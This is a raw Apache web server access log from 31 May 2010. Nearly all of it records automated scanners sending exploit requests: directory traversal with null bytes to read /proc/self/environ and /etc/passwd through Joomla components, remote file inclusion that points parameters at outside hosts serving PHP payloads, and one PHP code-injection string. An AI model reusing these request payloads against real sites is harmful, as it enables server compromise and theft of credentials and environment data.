66.90.73.48 - - [31/May/2010:06:51:40 -0500] "GET /logs/access_log.1272153600//?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.65.134 - - [31/May/2010:06:52:46 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:52:46 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:52:46 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
65.49.28.194 - - [31/May/2010:06:53:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.820"
65.49.28.194 - - [31/May/2010:06:53:23 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
65.49.28.194 - - [31/May/2010:06:53:23 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.820"
209.216.201.8 - - [31/May/2010:06:53:24 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
209.216.201.8 - - [31/May/2010:06:53:25 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
209.216.201.8 - - [31/May/2010:06:53:25 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
74.55.65.134 - - [31/May/2010:06:53:31 -0500] "GET /logs/access_log.1274313600//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:31 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:31 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:39 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:39 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:39 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:41 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:41 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:53:41 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
173.203.115.77 - - [31/May/2010:06:53:51 -0500] "GET /logs/access_log.1205107200/index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [31/May/2010:06:53:51 -0500] "GET /index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [31/May/2010:06:53:51 -0500] "GET /logs/index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
203.72.226.120 - - [31/May/2010:06:53:52 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.72.226.120 - - [31/May/2010:06:53:53 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.216.201.8 - - [31/May/2010:06:54:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
69.175.14.66 - - [31/May/2010:06:54:23 -0500] "GET /logs/access_log.1272412800//?_PHPLIB[libdir]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:06:54:23 -0500] "GET /logs/access_log.1270857600//?_PHPLIB[libdir]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:06:54:23 -0500] "GET /logs//?_PHPLIB[libdir]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 200 7675 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:06:54:23 -0500] "GET //?_PHPLIB[libdir]=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.55.65.134 - - [31/May/2010:06:54:58 -0500] "GET /logs/access_log.1274313600//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:54:58 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:54:58 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
92.241.190.214 - - [31/May/2010:06:55:43 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
67.18.167.170 - - [31/May/2010:06:55:47 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:06:55:47 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:06:55:47 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.46.199.199 - - [31/May/2010:06:55:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:06:56:08 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.201.191 - - [31/May/2010:06:56:28 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:06:56:28 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:06:56:28 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
67.18.167.170 - - [31/May/2010:06:56:34 -0500] "GET /logs/access_log.1274572800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
76.12.58.212 - - [31/May/2010:06:56:58 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.110.132.7 - - [31/May/2010:06:57:14 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:14 -0500] "GET //config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:14 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:28 -0500] "GET //config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:28 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:28 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:41 -0500] "GET //config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:41 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:57:41 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.121.201.191 - - [31/May/2010:06:57:44 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
67.227.143.132 - - [31/May/2010:06:58:20 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
195.190.166.35 - - [31/May/2010:06:58:44 -0500] "GET /logs/access_log.1212451200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
195.190.166.35 - - [31/May/2010:06:58:44 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
195.190.166.35 - - [31/May/2010:06:58:45 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
195.190.166.35 - - [31/May/2010:06:59:07 -0500] "GET /logs/access_log.1274227200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
208.110.132.7 - - [31/May/2010:06:59:26 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:59:26 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:06:59:26 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
173.203.115.77 - - [31/May/2010:07:00:17 -0500] "GET /logs/access_log.1205107200/index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [31/May/2010:07:00:17 -0500] "GET /index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [31/May/2010:07:00:17 -0500] "GET /logs/index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
74.55.65.134 - - [31/May/2010:07:00:41 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:07:00:50 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:07:00:57 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
208.110.132.7 - - [31/May/2010:07:01:36 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:01:36 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:01:36 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:01:51 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:01:51 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:01:51 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:02 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:02 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:02 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:22 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:22 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:22 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
219.117.209.213 - - [31/May/2010:07:02:25 -0500] "GET /logs/Index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
219.117.209.213 - - [31/May/2010:07:02:25 -0500] "GET /Index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.110.132.7 - - [31/May/2010:07:02:26 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:26 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:02:26 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
91.121.201.191 - - [31/May/2010:07:02:27 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:07:02:28 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:07:02:28 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.210.98.40 - - [31/May/2010:07:02:29 -0500] "GET /logs/access_log.1273017600///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
67.210.98.40 - - [31/May/2010:07:02:29 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
67.210.98.40 - - [31/May/2010:07:02:29 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.833"
65.49.28.194 - - [31/May/2010:07:02:48 -0500] "GET /logs/Index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
65.49.28.194 - - [31/May/2010:07:02:48 -0500] "GET /Index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
200.43.180.250 - - [31/May/2010:07:03:15 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:07:03:16 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:07:03:17 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
174.121.162.252 - - [31/May/2010:07:03:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.121.162.252 - - [31/May/2010:07:03:20 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.55.65.134 - - [31/May/2010:07:03:24 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:07:03:24 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:07:03:24 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
92.241.190.214 - - [31/May/2010:07:03:29 -0500] "GET /logs/access_log.1273363200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
92.241.190.214 - - [31/May/2010:07:03:29 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
92.241.190.214 - - [31/May/2010:07:03:30 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
200.43.180.250 - - [31/May/2010:07:05:06 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
208.110.132.7 - - [31/May/2010:07:05:16 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:05:16 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:05:16 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:05:26 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:05:26 -0500] "GET /logs/access_log.1271548800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
208.110.132.7 - - [31/May/2010:07:05:29 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
203.72.226.120 - - [31/May/2010:07:05:48 -0500] "GET /logs/Index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.72.226.120 - - [31/May/2010:07:05:48 -0500] "GET /Index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.201.191 - - [31/May/2010:07:06:20 -0500] "GET /logs/access_log.1274313600//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:07:06:21 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:07:06:21 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
207.46.195.231 - - [31/May/2010:07:06:25 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.58.212 - - [31/May/2010:07:08:35 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
65.49.28.194 - - [31/May/2010:07:08:50 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.820"
65.49.28.194 - - [31/May/2010:07:08:50 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
67.227.143.132 - - [31/May/2010:07:09:30 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
91.121.201.191 - - [31/May/2010:07:11:14 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
92.241.190.214 - - [31/May/2010:07:11:22 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
207.58.188.125 - - [31/May/2010:07:14:20 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
207.58.188.125 - - [31/May/2010:07:14:20 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.cacador.sc.gov.br/administrator/id.txt?%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
92.241.190.214 - - [31/May/2010:07:15:15 -0500] "GET /logs/access_log.1274313600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
207.46.13.94 - - [31/May/2010:07:15:26 -0500] "GET /logs/access_log.1156032000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.241.190.214 - - [31/May/2010:07:17:43 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
92.241.190.214 - - [31/May/2010:07:17:43 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
92.241.190.214 - - [31/May/2010:07:17:44 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
94.23.20.123 - - [31/May/2010:07:18:56 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [31/May/2010:07:18:56 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
